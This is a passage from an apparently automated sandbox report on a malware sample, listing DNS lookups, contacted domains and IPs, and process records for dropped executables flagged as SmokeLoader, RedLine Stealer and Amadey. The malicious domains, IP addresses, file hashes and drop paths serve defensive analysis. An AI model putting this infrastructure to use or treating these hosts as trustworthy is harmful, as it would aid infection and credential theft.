Nov 19, 2022 10:39:04.991622925 CET	192.168.2.3	8.8.8.8	0x8afc	Standard query (0)	svedbergbryanthusnonarithmetical.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:39:05.429963112 CET	192.168.2.3	8.8.8.8	0x8218	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:39:06.277318954 CET	192.168.2.3	8.8.8.8	0x6334	Standard query (0)	2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhq	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:39:12.060153961 CET	192.168.2.3	8.8.8.8	0xde8f	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:39:14.078975916 CET	192.168.2.3	8.8.8.8	0xe667	Standard query (0)	lentaphoto.at	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 19, 2022 10:36:51.095769882 CET	8.8.8.8	192.168.2.3	0xeec5	No error (0)	windowsupdatebg.s.llnwi.net		178.79.225.0	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:36:51.095769882 CET	8.8.8.8	192.168.2.3	0xeec5	No error (0)	windowsupdatebg.s.llnwi.net		95.140.230.192	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:51.842966080 CET	8.8.8.8	192.168.2.3	0xde57	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:52.583683014 CET	8.8.8.8	192.168.2.3	0x6ed	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:53.134239912 CET	8.8.8.8	192.168.2.3	0xb42c	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:53.431488991 CET	8.8.8.8	192.168.2.3	0x3f2a	No error (0)	srshf.com		108.167.141.212	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:54.634073973 CET	8.8.8.8	192.168.2.3	0xb96b	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:54.805392027 CET	8.8.8.8	192.168.2.3	0xb58b	No error (0)	iplogger.com		148.251.234.93	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:54.972848892 CET	8.8.8.8	192.168.2.3	0xadca	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:55.133872986 CET	8.8.8.8	192.168.2.3	0xe594	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:55.295975924 CET	8.8.8.8	192.168.2.3	0x8e00	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:55.703301907 CET	8.8.8.8	192.168.2.3	0xd493	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:37:55.883002043 CET	8.8.8.8	192.168.2.3	0x20c4	No error (0)	1ecosolution.it		46.252.148.24	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:03.435493946 CET	8.8.8.8	192.168.2.3	0x8bf5	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:03.871123075 CET	8.8.8.8	192.168.2.3	0xf694	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:04.030489922 CET	8.8.8.8	192.168.2.3	0xb8a2	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:04.214128971 CET	8.8.8.8	192.168.2.3	0x921c	No error (0)	cdn-102.anonfiles.com		195.96.151.51	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:04.422077894 CET	8.8.8.8	192.168.2.3	0xb4b4	No error (0)	anonfiles.com		45.154.253.151	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:04.422077894 CET	8.8.8.8	192.168.2.3	0xb4b4	No error (0)	anonfiles.com		45.154.253.152	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:04.422077894 CET	8.8.8.8	192.168.2.3	0xb4b4	No error (0)	anonfiles.com		45.154.253.150	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:04.615020037 CET	8.8.8.8	192.168.2.3	0xd613	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:04.785401106 CET	8.8.8.8	192.168.2.3	0x3427	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:04.950486898 CET	8.8.8.8	192.168.2.3	0xf816	No error (0)	bitbucket.org		104.192.141.1	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:05.499828100 CET	8.8.8.8	192.168.2.3	0xdbc8	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 19, 2022 10:38:05.499828100 CET	8.8.8.8	192.168.2.3	0xdbc8	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 19, 2022 10:38:05.499828100 CET	8.8.8.8	192.168.2.3	0xdbc8	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.206.73	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:05.499828100 CET	8.8.8.8	192.168.2.3	0xdbc8	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.16.107	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:05.499828100 CET	8.8.8.8	192.168.2.3	0xdbc8	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.24.52	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:05.499828100 CET	8.8.8.8	192.168.2.3	0xdbc8	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.13.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:05.499828100 CET	8.8.8.8	192.168.2.3	0xdbc8	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.3.100	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:05.499828100 CET	8.8.8.8	192.168.2.3	0xdbc8	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.137.17	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:05.499828100 CET	8.8.8.8	192.168.2.3	0xdbc8	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.214.81	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:05.499828100 CET	8.8.8.8	192.168.2.3	0xdbc8	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.88.171	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:09.030143976 CET	8.8.8.8	192.168.2.3	0x5215	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:09.215954065 CET	8.8.8.8	192.168.2.3	0xf417	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:10.590337038 CET	8.8.8.8	192.168.2.3	0x1f89	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:10.773845911 CET	8.8.8.8	192.168.2.3	0x9505	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:10.987179995 CET	8.8.8.8	192.168.2.3	0x729c	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:11.184869051 CET	8.8.8.8	192.168.2.3	0x18e2	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:14.725869894 CET	8.8.8.8	192.168.2.3	0xf502	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:14.890060902 CET	8.8.8.8	192.168.2.3	0xc662	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:15.060513020 CET	8.8.8.8	192.168.2.3	0x79af	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:15.701762915 CET	8.8.8.8	192.168.2.3	0x4cf3	No error (0)	hoteldostyk.com		43.231.112.109	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:20.839776039 CET	8.8.8.8	192.168.2.3	0x17f0	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:21.054763079 CET	8.8.8.8	192.168.2.3	0x3ce7	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:21.270658016 CET	8.8.8.8	192.168.2.3	0x7709	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:22.904759884 CET	8.8.8.8	192.168.2.3	0x88fc	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:23.112772942 CET	8.8.8.8	192.168.2.3	0xe063	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:25.967694998 CET	8.8.8.8	192.168.2.3	0x6f70	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:27.029911995 CET	8.8.8.8	192.168.2.3	0x8425	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:27.286843061 CET	8.8.8.8	192.168.2.3	0x5b74	No error (0)	cdn-104.anonfiles.com		195.96.151.53	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:27.554032087 CET	8.8.8.8	192.168.2.3	0xe85a	No error (0)	anonfiles.com		45.154.253.151	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:27.554032087 CET	8.8.8.8	192.168.2.3	0xe85a	No error (0)	anonfiles.com		45.154.253.152	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:27.554032087 CET	8.8.8.8	192.168.2.3	0xe85a	No error (0)	anonfiles.com		45.154.253.150	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:27.779742002 CET	8.8.8.8	192.168.2.3	0x7097	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:28.087229967 CET	8.8.8.8	192.168.2.3	0x699e	No error (0)	u.to		195.216.243.155	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:28.625432014 CET	8.8.8.8	192.168.2.3	0x8382	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:28.625432014 CET	8.8.8.8	192.168.2.3	0x8382	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:28.625432014 CET	8.8.8.8	192.168.2.3	0x8382	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:28.625432014 CET	8.8.8.8	192.168.2.3	0x8382	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:28.625432014 CET	8.8.8.8	192.168.2.3	0x8382	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:29.258445978 CET	8.8.8.8	192.168.2.3	0xf8cc	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:29.455861092 CET	8.8.8.8	192.168.2.3	0xa3aa	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:29.644002914 CET	8.8.8.8	192.168.2.3	0x140	No error (0)	github.com		140.82.121.4	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:29.907610893 CET	8.8.8.8	192.168.2.3	0x10c6	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:29.907610893 CET	8.8.8.8	192.168.2.3	0x10c6	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:29.907610893 CET	8.8.8.8	192.168.2.3	0x10c6	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:29.907610893 CET	8.8.8.8	192.168.2.3	0x10c6	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:30.754844904 CET	8.8.8.8	192.168.2.3	0x350b	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:30.916239977 CET	8.8.8.8	192.168.2.3	0x4ee1	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:31.107050896 CET	8.8.8.8	192.168.2.3	0xe6ab	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:31.276186943 CET	8.8.8.8	192.168.2.3	0x15a9	No error (0)	github.com		140.82.121.3	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:31.396316051 CET	8.8.8.8	192.168.2.3	0xa5d6	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:31.396316051 CET	8.8.8.8	192.168.2.3	0xa5d6	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:31.396316051 CET	8.8.8.8	192.168.2.3	0xa5d6	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:31.396316051 CET	8.8.8.8	192.168.2.3	0xa5d6	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:32.319535017 CET	8.8.8.8	192.168.2.3	0xdb7a	No error (0)	o36fafs3sn6xou.com		77.232.37.228	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:38:40.947027922 CET	8.8.8.8	192.168.2.3	0xc0c4	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:39:05.010046005 CET	8.8.8.8	192.168.2.3	0x8afc	No error (0)	svedbergbryanthusnonarithmetical.com		84.21.172.142	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:39:05.447870016 CET	8.8.8.8	192.168.2.3	0x8218	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 19, 2022 10:39:05.447870016 CET	8.8.8.8	192.168.2.3	0x8218	No error (0)	youtube-ui.l.google.com		172.217.168.14	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:39:05.447870016 CET	8.8.8.8	192.168.2.3	0x8218	No error (0)	youtube-ui.l.google.com		172.217.168.46	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:39:05.447870016 CET	8.8.8.8	192.168.2.3	0x8218	No error (0)	youtube-ui.l.google.com		172.217.168.78	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:39:05.447870016 CET	8.8.8.8	192.168.2.3	0x8218	No error (0)	youtube-ui.l.google.com		142.250.203.110	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:39:05.447870016 CET	8.8.8.8	192.168.2.3	0x8218	No error (0)	youtube-ui.l.google.com		216.58.215.238	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:39:06.295533895 CET	8.8.8.8	192.168.2.3	0x6334	Name error (3)	2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhq	none	none	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:39:12.079382896 CET	8.8.8.8	192.168.2.3	0xde8f	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Nov 19, 2022 10:39:14.447832108 CET	8.8.8.8	192.168.2.3	0xe667	Server failure (2)	lentaphoto.at	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

srshf.com

iplogger.com

cdn-102.anonfiles.com

anonfiles.com

bitbucket.org

bbuseruploads.s3.amazonaws.com

transfer.sh

hoteldostyk.com

cdn-104.anonfiles.com

u.to

cdn.discordapp.com

github.com

raw.githubusercontent.com

t.me

debvplifcf.com

o36fafs3sn6xou.com

kpswfp.com

sdins.com

auypktwjk.net

ebvtwkfux.com

hqmym.org

datryh.net

ajpfnqvlq.net

sxihacbmgi.com

upkkyf.com

hgusiwjl.com

ulciihlbw.org

bjtfrvl.com

vvydl.com

jtmdotimkr.org

193.56.146.168

gsqxoged.net

ahgwjjm.org

efngjyqy.org

ukkwrl.org

ebaxoe.net

eqghptenl.com

ptpfdpcirh.net

etebl.net

aexqt.org

aehnv.net

89.208.107.216

fbybhia.org

fhkewyoq.net

mqfbhqf.com

acxiqgb.org

xawdohy.net

uvlvsvw.com

jorxt.net

syohyc.net

cbmlqnw.com

116.202.5.101

193.56.146.174

Target ID:	0
Start time:	10:36:56
Start date:	19/11/2022
Path:	C:\Users\user\Desktop\S2XJ2wbz7u.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\S2XJ2wbz7u.exe
Imagebase:	0x400000
File size:	343552 bytes
MD5 hash:	FFB4CF34B38F126C917E1C1E1D26DF73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.326943587.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.327031304.0000000000891000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Analysis Process: explorer.exePID: 3452, Parent PID: 6020

General

Target ID:	1
Start time:	10:37:05
Start date:	19/11/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high

Analysis Process: tiddsjjPID: 3152, Parent PID: 1080

General

Target ID:	11
Start time:	10:37:52
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Roaming\tiddsjj
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\tiddsjj
Imagebase:	0x400000
File size:	343552 bytes
MD5 hash:	FFB4CF34B38F126C917E1C1E1D26DF73
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000002.378510967.0000000000930000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.378663629.0000000000B41000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: 2B4A.exePID: 5260, Parent PID: 3452

General

Target ID:	12
Start time:	10:38:07
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\2B4A.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\2B4A.exe
Imagebase:	0x400000
File size:	300544 bytes
MD5 hash:	2DEE200193091BE2F2321D921750C4ED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.540373176.00000000007D6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: NaN%, Metadefender, Browse Detection: 73%, ReversingLabs
Reputation:	low

Analysis Process: 3790.exePID: 2336, Parent PID: 3452

General

Target ID:	13
Start time:	10:38:10
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\3790.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\3790.exe
Imagebase:	0x400000
File size:	382464 bytes
MD5 hash:	5E08968D858224A33175069D64DC7F39
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.419975883.0000000000A61000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: 453D.exePID: 4024, Parent PID: 3452

General

Target ID:	14
Start time:	10:38:13
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\453D.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\453D.exe
Imagebase:	0x400000
File size:	1235912 bytes
MD5 hash:	F96144B1D5B53D93CAADDDADE38DB5E9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.557498334.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 21%, ReversingLabs
Reputation:	low

Analysis Process: rovwer.exePID: 4764, Parent PID: 2336

General

Target ID:	15
Start time:	10:38:16
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
Imagebase:	0x400000
File size:	382464 bytes
MD5 hash:	5E08968D858224A33175069D64DC7F39
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.538954387.0000000000A91000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.551885520.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000F.00000002.529416121.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: 59FE.exePID: 5228, Parent PID: 3452

General

Target ID:	16
Start time:	10:38:19
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\59FE.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\59FE.exe
Imagebase:	0x7ff74a220000
File size:	3188224 bytes
MD5 hash:	44A7E13ECC55CE9797C5121B230D9927
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: 6644.exePID: 1916, Parent PID: 3452

General

Target ID:	19
Start time:	10:38:22
Start date:	19/11/2022
Path:	C:\Users\user\AppData\Local\Temp\6644.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\6644.exe
Imagebase:	0x400000
File size:	342528 bytes
MD5 hash:	19A79DADDFAAC09499E79ADE27E756F8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
